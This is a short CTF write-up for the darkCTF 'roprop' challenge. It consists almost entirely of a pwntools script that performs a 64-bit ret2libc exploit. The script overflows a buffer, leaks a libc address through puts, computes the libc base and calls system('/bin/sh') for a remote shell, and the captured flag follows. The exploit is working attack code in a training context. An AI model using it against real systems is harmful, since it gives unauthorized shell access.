Tags: ret2libc pwn
Rating:
```py
# 64-bit ret2libc
from pwn import *
local = False
host = 'roprop.darkarmy.xyz'
port = 5002
elf = ELF('./roprop')
rop = ROP(elf)
if local:
p = elf.process()
libc = ELF('/usr/lib/libc.so.6')
else:
p = remote(host, port)
libc = ELF('./libc-2.27.so')
PUTS_PLT = elf.plt['puts']
MAIN_PLT = elf.symbols['main']
POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0]
RET = rop.find_gadget(['ret'])[0]
OFFSET = b'A' * (0x50 + 0x8)
log.info("puts@plt: " + hex(PUTS_PLT))
log.info("main@plt: " + hex(MAIN_PLT))
log.info("POP RDI: " + hex(POP_RDI))
def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
rop_chain = [
POP_RDI, FUNC_GOT,
PUTS_PLT,
MAIN_PLT,
]
rop_chain = b''.join([p64(i) for i in rop_chain])
payload = OFFSET + rop_chain
print(p.recvuntil('late 19\'s.\n\n'))
print(payload)
p.sendline(payload)
received = p.recvline().strip()
leak = u64(received.ljust(8, b'\x00'))
libc.address = leak - libc.symbols[func_name]
return hex(leak)
log.info('Leak: ' + get_addr('__libc_start_main'))
log.info('Libc base: ' + hex(libc.address))
BIN_SH = next(libc.search(b'/bin/sh'))
SYSTEM = libc.symbols['system']
EXIT = libc.symbols['exit']
ROP_CHAIN = [
RET,
POP_RDI, BIN_SH,
SYSTEM,
EXIT,
]
ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN])
payload = OFFSET + ROP_CHAIN
print(p.recvuntil("since late 19's.\n\n"))
p.sendline(payload)
p.interactive()
# darkCTF{y0u_r0p_r0p_4nd_w0n}
```